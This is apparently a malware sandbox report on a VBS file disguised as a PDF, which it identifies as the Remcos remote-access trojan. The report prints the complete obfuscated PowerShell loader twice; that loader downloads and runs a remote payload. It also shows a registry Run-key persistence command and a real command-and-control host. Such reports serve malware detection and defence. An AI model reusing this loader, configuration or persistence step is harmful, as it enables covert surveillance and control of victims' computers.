Overview

overview

10

Static

static

1

Document B...df.vbs

windows7-x64

10

Document B...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28-11-2024 17:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Document BT24·pdf.vbs

  • Size

    33KB

  • MD5

    b9d77e317447cf7b4fc1b538d04a35d7

  • SHA1

    4bfff79ba434d7c5a508f9ba2720f4ef47cfecec

  • SHA256

    1e74e14032fe7b84a6285d72cfea681f4ec1d0bffe896f02fac5f0c5e5b96060

  • SHA512

    9691361f42668c8dcf9764ac86ad355c5039ca927140ce732452cba7df12bad70ff46c87c54cd8ae6e6cf4673e3bc57894663c8b301f0e40344c0b21dab20ce7

  • SSDEEP

    768:EA9as2DrXeg09BTUUsKNq4Hm8hZn6TgXzwbVV+E2rEJ9YnCmw6fd:D9asyevU844HT/6azCkE2oJIu6d

Score
10/10
remcosremotehostdiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$vandresourcers='Borgerpligts';;$Theobromic202='Fukssvanses';;$Dunt='Absurdisten';;$Milieuomraadets='Chrysophyllum';;$Diamantbrylluppernes='Catalyses';;$Clappered=$host.Name;function Sastrugi($Dampbadenes){If ($Clappered) {$Arkitekttegningens=4} for ($Regionalprogrammerne=$Arkitekttegningens;;$Regionalprogrammerne+=5){if(!$Dampbadenes[$Regionalprogrammerne]) { break }$Forumers+=$Dampbadenes[$Regionalprogrammerne]}$Forumers}function Svmmeprvens($Remobilizing){ .($Linguae) ($Remobilizing)}$Sangpdagoger=Sastrugi 'Percn,ndeeBlaattele. SkoWUforeMa eBTabuCremoLGr uI SeqE vernOleat';$Radialia=Sastrugi ' legMUnbro Broz ProiBetol PoslYikeaSkde/';$Goatherd=Sastrugi 'van T Fo.lNinns Kon1Sikk2';$Afrundendes='Tewe[ PusN udsELu ut Han.JuleSBogoEVi eRBusbvfrieIwhizC ,umESkpppp,rso Stai eucN TodtDyveM aiaFo nn Jera LivgSemieSnjarenig]G aa:Topp:BrnlSVa be G,sC afsUFotor H,ciFlleTTrepY EupPKu,sRAntiO.orgTLeveOKlbecForsOSm eLLssa=Di e$ D mGphotoPitiAMadoT ConH,ortETyr.RoverD';$Radialia+=Sastrugi 'Kikk5Ethe. Sm.0Eksk Unbu(VedeWReiniHovenD.spd A ioFro wgubbsMili EsmaNIn xTFor Smer1 T,i0Verd.Sl d0Data; F a OculWSulkiHjemnKbsv6 Gon4stri;Byre ,onbxZ go6Thor4Mini;D al Hulkr.ddav.eme:john1L,ft3 fin1Port.S zi0Unco)Inst AloeGholleC,vecAtikkFragoPebb/ Jos2Reno0srsy1Prin0Pl s0Skrn1Verd0Tr n1Rood ElleFBehoiWrearRep,e KanfobidoS.lmx rif/Braz1 Row3Uans1Pakn. Ba.0';$Tremoloerne=Sastrugi ' Lydu nrrSSalvEAfgir Syn-SwarATandGLid EIrriN vett';$Pteropod=Sastrugi 'Vil hE octShantbe,apKupfsDele:T mm/Werw/BlaadOverr Cati SubvPu teP le.RollgKaido Bruo DusgHeadlKunseChry. AnkcNatmosterm ,gl/R gauChasc Bot?Timee L nxUdrup tato.ratr L.mt Val=,enodPropoP,rewAll nG,odlBittoPiecaSupedU em& Pe igavod U s= Re 1SundbgreeqStilSRatig Vesg bouW InscOpprlTempw TagLFlaa5 Skol hotOApprgfritRGasbfBro LPunktEt,mU aywlDivaFHej PEman8AnviWDy nFbe.mlEdibQ ropQSar 6S ygG DyrStune3';$Wac=Sastrugi 'Dd s>';$Linguae=Sastrugi 'Hdr iCapceOpdyx';$Onomancy='correlativity';$Begrnsende='\Hovedaktionrer179.Lin';Svmmeprvens (Sastrugi ' E,a$MultGHalvl ImpoAutobHo oaAltel Mal:CertKK deoFrakMTrenM Trau O tNYndla ForrHejddEksa=Afbi$Stere ifeNAdviVLand:HoopaIn.epF,roPPos dsemia CheTudspa Bur+Stal$Demob IchEHyldGGrn RA deNCaneSCalaEKnsbnTakkd nonE');Svmmeprvens (Sastrugi ' Des$ParagGlovlI dhoErfab StiAAntiLS ec: A.kPFlisR SamOSa,mFForelpastiRnt,GUnmea,ritCO tfIFiskEForfS S,p=Kigs$Saalp sirTPenueatrorEmbrO ejlPStraOPelidGlam.PseuSConcpBldslSluiIbasitTim.(stat$TortWTarvAKogecafho)');Svmmeprvens (Sastrugi $Afrundendes);$Pteropod=$Profligacies[0];$Batistet=(Sastrugi ' pol$To hGPartLMilloSilvBarmoaStraL Max:preas SerC howaComppSoldIFormn A pGBo,d=M,nunSoevEInstwMerg- BlaOTeleBHitcJJay EunciCBefrt ara TiteSGkkeYOpinsProptEtereAcr.mprec. fdr$ .ucsManzA Ko NSottGAdrePEigeD lbeaAttaG eho jerGTakteStatR');Svmmeprvens ($Batistet);Svmmeprvens (Sastrugi 'Unra$ ,veS MaucLovpa SoupRetsiWappnStimg Dra.DeciHNakoeUmi,a LogdFej eDracrIsocs Dik[V lu$ReckTLygtrChi eStabmKl.noRaadlTaboo Smae hewr Radn Bile Alo]Forl=In.r$StyrRCantaR,todbagli areagenelStariBer.a');$Resynthetize=Sastrugi 'Lewd$SystSAnglcCravais gpFadeiE kanCruegCabb. MytD.oploMalcwVashnGliplCo moRudka randO raFDemii Tell geneNedd(Sn.k$.arsP Famt dvieCatsrSporo uscpJordo atcdArgu,Work$UdlgAVgten AnsaProdlW igyStils roueC immInfloSo.idPreleDemolAfl.)';$Analysemodel=$Kommunard;Svmmeprvens (Sastrugi ' Ch $Ste,GPakel nugOClanBTrilaTupiLSols:St.lETabup,ratiPotalFal aInsttMoo,O AntRFadg=Omen(H,maTLuppEVgtiSCanotMaal- s.apAfpoaSt mt F lHRa,k S,ge$ SinaListN onaH lvlrumky,enhsSa deSnidMStegOPir,d LubEU polB.go)');while (!$Epilator) {Svmmeprvens (Sastrugi 'Slud$NighgMedil Afio ilbRe ia UdglLitt:CremPMisdrEtheeGy nsGenec Tatrpa aiOverpSal tP ngiStrob DobiRegalChiriPirotCarpyTork=Pole$SkirTMameaTandrFuldaDr vz Grue Mitd') ;Svmmeprvens $Resynthetize;Svmmeprvens (Sastrugi 'ShaispermT Idea aluRStunTP tc-Fes,SOverL SocESmd,eRevapBlok Ug,d4');Svmmeprvens (Sastrugi ' Kn.$Co.eGSa iLRubbOSyntbUdflAGrapLLand:Fa aEeisepSpgeIByggl HexAGulst Inho Em rbl n=H.rp(UndetGoddeSignSFl ct Tar- TilP FalAEnvoTB nihSelv at$Ble,AukamNRomaaCan.LRu aYA kesN dbEU.coMBi.loP otDsoliEMedlLfal )') ;Svmmeprvens (Sastrugi 'Doec$P.angAfg l LevO S rBColoAStablVaab: V nsBri,a UndI FroL MisOAnnerUndeiColozOpviI FleN I bGHe dsHydr=.rbe$OverGCanvlHe,oo DecBOverAEquiLKos,:IndssNvnit IrlUSrb,t DumT InteBoatrBivai Id HF emOMiaspfragPHenbEGamb+Hind+De u%Grim$,nnapAfprR AnaOFokufEle,LId lIBankgRadmaBugpc Teli DisEPrmismen .PneuC SimOSemuUMagtN ncT') ;$Pteropod=$Profligacies[$Sailorizings]}$Regionalprogrammernendsmuglingerne=309529;$Disjunctor=31536;Svmmeprvens (Sastrugi 'Meta$SmerGOrnil Kloo Harb ajaMedilDisb:FrarUUdliDLvsplIsoaB forsUsmiTPolyiBeauD .ens Seap KatUSta.nUncaKAnn.tUn rEc rrTB ne stje=Unan GigaG gtee vertBarb- Ba cBls.OKnocnUn rtDaggEYuccNdrudT so Pot $S udAu,ben pa,AT reLOpskyT rbSUtaleR mmMSemiOIn edIndfeOverL');Svmmeprvens (Sastrugi 'Tilb$ Lnug Bygl ,vaost.ib ,asaBonzlNond:.eloK AncaIdellParnk AteuK,rdnnerdlScruaHyp aH rrr lsf Eng=Unfa Bom,[OrgaSKompy Pols Prot KoreRolemBall.hydrC A hoLacqnUnr,vDataeMailrVe etAnke] Das:Ka.t: CesFHeltr Ostosn gmChamBIslaaPaafs .iseKaka6 Dek4PoliSUnuntEdderOveri Ov n klugPhi (Fo s$BaasU DjvdBerel ,adbAbsos untAngeiKarldArunsS inpKlenu Catn CytkGenotB oweSk ut Hel)');Svmmeprvens (Sastrugi 'M lt$Fri.gUds lLeptoGalmB nodAOverlKame:SlagS BurTTrosASk naIndottrekR eulOImmul HakD halEBurgNKanusIn e ,lg=Livr Komm[TomnsBa.tyWreas UnpT OveEBemamUd n. PsaTVerde ernX conTKopo.VoldEHyp,NNonicstnnomar.dSpk,IFotonB.atGKigg]Spoo: Pan:ChorAwomesBillCCirciUndii hai.An.igIs rEScarTNyopSAlfrtInadrGashIK mmNnic g r.g( Mar$DeraKEarmAAposl RevKOb tUFl,bnTe elKonsa .mka VesRGraf)');Svmmeprvens (Sastrugi ' Skr$VictgIndll Ci.O aksB teoa CorlLi e:GufscKnska SpuVM,ntaSluklBypa= Cha$ Ep,SGranT TacA.isaAKlasTAa,eROnomOadvaL rieDReine.eriNstn,sen a. ImpsaandUT,lebP,rnsSport SlarUndeIStraN GengSecc(Skal$Und.rKny.EP lhGBindiUnexocof.NS avAIwbelUndiPPhilr oldoRoitgSkovRHotnaBee mAestMSyr ESmugRPrecnVkkeE Fr nBlacd eouS PenmPavoUGagcg upilValgIBre NNondg CapeSt,eRHur,n,ilbETrip,out,$ Ve dCom iMonoS PosjBet U EgoNSma cSammTDissO ProR tr )');Svmmeprvens $Caval;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2332
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$vandresourcers='Borgerpligts';;$Theobromic202='Fukssvanses';;$Dunt='Absurdisten';;$Milieuomraadets='Chrysophyllum';;$Diamantbrylluppernes='Catalyses';;$Clappered=$host.Name;function Sastrugi($Dampbadenes){If ($Clappered) {$Arkitekttegningens=4} for ($Regionalprogrammerne=$Arkitekttegningens;;$Regionalprogrammerne+=5){if(!$Dampbadenes[$Regionalprogrammerne]) { break }$Forumers+=$Dampbadenes[$Regionalprogrammerne]}$Forumers}function Svmmeprvens($Remobilizing){ .($Linguae) ($Remobilizing)}$Sangpdagoger=Sastrugi 'Percn,ndeeBlaattele. SkoWUforeMa eBTabuCremoLGr uI SeqE vernOleat';$Radialia=Sastrugi ' legMUnbro Broz ProiBetol PoslYikeaSkde/';$Goatherd=Sastrugi 'van T Fo.lNinns Kon1Sikk2';$Afrundendes='Tewe[ PusN udsELu ut Han.JuleSBogoEVi eRBusbvfrieIwhizC ,umESkpppp,rso Stai eucN TodtDyveM aiaFo nn Jera LivgSemieSnjarenig]G aa:Topp:BrnlSVa be G,sC afsUFotor H,ciFlleTTrepY EupPKu,sRAntiO.orgTLeveOKlbecForsOSm eLLssa=Di e$ D mGphotoPitiAMadoT ConH,ortETyr.RoverD';$Radialia+=Sastrugi 'Kikk5Ethe. Sm.0Eksk Unbu(VedeWReiniHovenD.spd A ioFro wgubbsMili EsmaNIn xTFor Smer1 T,i0Verd.Sl d0Data; F a OculWSulkiHjemnKbsv6 Gon4stri;Byre ,onbxZ go6Thor4Mini;D al Hulkr.ddav.eme:john1L,ft3 fin1Port.S zi0Unco)Inst AloeGholleC,vecAtikkFragoPebb/ Jos2Reno0srsy1Prin0Pl s0Skrn1Verd0Tr n1Rood ElleFBehoiWrearRep,e KanfobidoS.lmx rif/Braz1 Row3Uans1Pakn. Ba.0';$Tremoloerne=Sastrugi ' Lydu nrrSSalvEAfgir Syn-SwarATandGLid EIrriN vett';$Pteropod=Sastrugi 'Vil hE octShantbe,apKupfsDele:T mm/Werw/BlaadOverr Cati SubvPu teP le.RollgKaido Bruo DusgHeadlKunseChry. AnkcNatmosterm ,gl/R gauChasc Bot?Timee L nxUdrup tato.ratr L.mt Val=,enodPropoP,rewAll nG,odlBittoPiecaSupedU em& Pe igavod U s= Re 1SundbgreeqStilSRatig Vesg bouW InscOpprlTempw TagLFlaa5 Skol hotOApprgfritRGasbfBro LPunktEt,mU aywlDivaFHej PEman8AnviWDy nFbe.mlEdibQ ropQSar 6S ygG DyrStune3';$Wac=Sastrugi 'Dd s>';$Linguae=Sastrugi 'Hdr iCapceOpdyx';$Onomancy='correlativity';$Begrnsende='\Hovedaktionrer179.Lin';Svmmeprvens (Sastrugi ' E,a$MultGHalvl ImpoAutobHo oaAltel Mal:CertKK deoFrakMTrenM Trau O tNYndla ForrHejddEksa=Afbi$Stere ifeNAdviVLand:HoopaIn.epF,roPPos dsemia CheTudspa Bur+Stal$Demob IchEHyldGGrn RA deNCaneSCalaEKnsbnTakkd nonE');Svmmeprvens (Sastrugi ' Des$ParagGlovlI dhoErfab StiAAntiLS ec: A.kPFlisR SamOSa,mFForelpastiRnt,GUnmea,ritCO tfIFiskEForfS S,p=Kigs$Saalp sirTPenueatrorEmbrO ejlPStraOPelidGlam.PseuSConcpBldslSluiIbasitTim.(stat$TortWTarvAKogecafho)');Svmmeprvens (Sastrugi $Afrundendes);$Pteropod=$Profligacies[0];$Batistet=(Sastrugi ' pol$To hGPartLMilloSilvBarmoaStraL Max:preas SerC howaComppSoldIFormn A pGBo,d=M,nunSoevEInstwMerg- BlaOTeleBHitcJJay EunciCBefrt ara TiteSGkkeYOpinsProptEtereAcr.mprec. fdr$ .ucsManzA Ko NSottGAdrePEigeD lbeaAttaG eho jerGTakteStatR');Svmmeprvens ($Batistet);Svmmeprvens (Sastrugi 'Unra$ ,veS MaucLovpa SoupRetsiWappnStimg Dra.DeciHNakoeUmi,a LogdFej eDracrIsocs Dik[V lu$ReckTLygtrChi eStabmKl.noRaadlTaboo Smae hewr Radn Bile Alo]Forl=In.r$StyrRCantaR,todbagli areagenelStariBer.a');$Resynthetize=Sastrugi 'Lewd$SystSAnglcCravais gpFadeiE kanCruegCabb. MytD.oploMalcwVashnGliplCo moRudka randO raFDemii Tell geneNedd(Sn.k$.arsP Famt dvieCatsrSporo uscpJordo atcdArgu,Work$UdlgAVgten AnsaProdlW igyStils roueC immInfloSo.idPreleDemolAfl.)';$Analysemodel=$Kommunard;Svmmeprvens (Sastrugi ' Ch $Ste,GPakel nugOClanBTrilaTupiLSols:St.lETabup,ratiPotalFal aInsttMoo,O AntRFadg=Omen(H,maTLuppEVgtiSCanotMaal- s.apAfpoaSt mt F lHRa,k S,ge$ SinaListN onaH lvlrumky,enhsSa deSnidMStegOPir,d LubEU polB.go)');while (!$Epilator) {Svmmeprvens (Sastrugi 'Slud$NighgMedil Afio ilbRe ia UdglLitt:CremPMisdrEtheeGy nsGenec Tatrpa aiOverpSal tP ngiStrob DobiRegalChiriPirotCarpyTork=Pole$SkirTMameaTandrFuldaDr vz Grue Mitd') ;Svmmeprvens $Resynthetize;Svmmeprvens (Sastrugi 'ShaispermT Idea aluRStunTP tc-Fes,SOverL SocESmd,eRevapBlok Ug,d4');Svmmeprvens (Sastrugi ' Kn.$Co.eGSa iLRubbOSyntbUdflAGrapLLand:Fa aEeisepSpgeIByggl HexAGulst Inho Em rbl n=H.rp(UndetGoddeSignSFl ct Tar- TilP FalAEnvoTB nihSelv at$Ble,AukamNRomaaCan.LRu aYA kesN dbEU.coMBi.loP otDsoliEMedlLfal )') ;Svmmeprvens (Sastrugi 'Doec$P.angAfg l LevO S rBColoAStablVaab: V nsBri,a UndI FroL MisOAnnerUndeiColozOpviI FleN I bGHe dsHydr=.rbe$OverGCanvlHe,oo DecBOverAEquiLKos,:IndssNvnit IrlUSrb,t DumT InteBoatrBivai Id HF emOMiaspfragPHenbEGamb+Hind+De u%Grim$,nnapAfprR AnaOFokufEle,LId lIBankgRadmaBugpc Teli DisEPrmismen .PneuC SimOSemuUMagtN ncT') ;$Pteropod=$Profligacies[$Sailorizings]}$Regionalprogrammernendsmuglingerne=309529;$Disjunctor=31536;Svmmeprvens (Sastrugi 'Meta$SmerGOrnil Kloo Harb ajaMedilDisb:FrarUUdliDLvsplIsoaB forsUsmiTPolyiBeauD .ens Seap KatUSta.nUncaKAnn.tUn rEc rrTB ne stje=Unan GigaG gtee vertBarb- Ba cBls.OKnocnUn rtDaggEYuccNdrudT so Pot $S udAu,ben pa,AT reLOpskyT rbSUtaleR mmMSemiOIn edIndfeOverL');Svmmeprvens (Sastrugi 'Tilb$ Lnug Bygl ,vaost.ib ,asaBonzlNond:.eloK AncaIdellParnk AteuK,rdnnerdlScruaHyp aH rrr lsf Eng=Unfa Bom,[OrgaSKompy Pols Prot KoreRolemBall.hydrC A hoLacqnUnr,vDataeMailrVe etAnke] Das:Ka.t: CesFHeltr Ostosn gmChamBIslaaPaafs .iseKaka6 Dek4PoliSUnuntEdderOveri Ov n klugPhi (Fo s$BaasU DjvdBerel ,adbAbsos untAngeiKarldArunsS inpKlenu Catn CytkGenotB oweSk ut Hel)');Svmmeprvens (Sastrugi 'M lt$Fri.gUds lLeptoGalmB nodAOverlKame:SlagS BurTTrosASk naIndottrekR eulOImmul HakD halEBurgNKanusIn e ,lg=Livr Komm[TomnsBa.tyWreas UnpT OveEBemamUd n. PsaTVerde ernX conTKopo.VoldEHyp,NNonicstnnomar.dSpk,IFotonB.atGKigg]Spoo: Pan:ChorAwomesBillCCirciUndii hai.An.igIs rEScarTNyopSAlfrtInadrGashIK mmNnic g r.g( Mar$DeraKEarmAAposl RevKOb tUFl,bnTe elKonsa .mka VesRGraf)');Svmmeprvens (Sastrugi ' Skr$VictgIndll Ci.O aksB teoa CorlLi e:GufscKnska SpuVM,ntaSluklBypa= Cha$ Ep,SGranT TacA.isaAKlasTAa,eROnomOadvaL rieDReine.eriNstn,sen a. ImpsaandUT,lebP,rnsSport SlarUndeIStraN GengSecc(Skal$Und.rKny.EP lhGBindiUnexocof.NS avAIwbelUndiPPhilr oldoRoitgSkovRHotnaBee mAestMSyr ESmugRPrecnVkkeE Fr nBlacd eouS PenmPavoUGagcg upilValgIBre NNondg CapeSt,eRHur,n,ilbETrip,out,$ Ve dCom iMonoS PosjBet U EgoNSma cSammTDissO ProR tr )');Svmmeprvens $Caval;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3024
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aidless125% -windowstyle 1 $Grangiveligt=(gp -Path 'HKCU:\Software\Produktionsdatabaser11\').Monociliated;%Aidless125% ($Grangiveligt)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3008
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aidless125% -windowstyle 1 $Grangiveligt=(gp -Path 'HKCU:\Software\Produktionsdatabaser11\').Monociliated;%Aidless125% ($Grangiveligt)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2860

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    662abf318f596a1e1965981e1f9de7c6

    SHA1

    2eaff3645ba836967360423912718417fbb2a2a7

    SHA256

    abb6a913b33301a9e4b57c42976fe93c608d7df67527b5b435c5cf2f7286abba

    SHA512

    bcc4a16878235451dff9d44530c235daf98d0cbce884f737c4864c12c0d2699f1d93e047425ca47b0415c0b608716896555bd525cffc13f6b2a7cfe6226844c9

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab90CD.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar11CD.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Hovedaktionrer179.Lin
    Filesize

    444KB

    MD5

    1a7915fabbce501dd7afe88661bcbe9c

    SHA1

    d668290fab52392569a7a75725657dd2f723b995

    SHA256

    c80389f6adceb9209c16c3809e1bdba055e06dc1dcf7a151478c3c6ac8274428

    SHA512

    035bd6316b35020439885b90bd24c6269bd207a8613f3e7856c2b8386193012e93b2d801178c13e530fd5dda5d48419a8eea440011fd36f4714ffbd8263a3fbc

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GROKM6E8LTNA3R4ILYNX.temp
    Filesize

    7KB

    MD5

    b1c9b6252c9ab802d778fc00ffd91575

    SHA1

    06abcb90669e38497b0507ca5bddb214e18c1c10

    SHA256

    bf0eb73c4bb59a82a4bc4d74607904a7ba5f3434f33655b636d2757ddc463047

    SHA512

    d18cccf80b03e4db2ade908efcfd2c123567b96efc860ae888c4e51027e3697ce1f964e51750809cf6bd5f6f3c19cc1c6289d7828d3bf7d393c2f913e6e77d5a

    Download Submit

  • memory/2332-23-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-25-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-26-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-28-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-29-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2332-31-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-24-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-22-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2332-21-0x000000001B630000-0x000000001B912000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2332-20-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2720-35-0x00000000065C0000-0x0000000008F13000-memory.dmp

    Filesize

    41.3MB

    Download

  • memory/3024-55-0x0000000000420000-0x0000000001482000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3024-60-0x0000000000420000-0x0000000001482000-memory.dmp

    Filesize

    16.4MB

    Download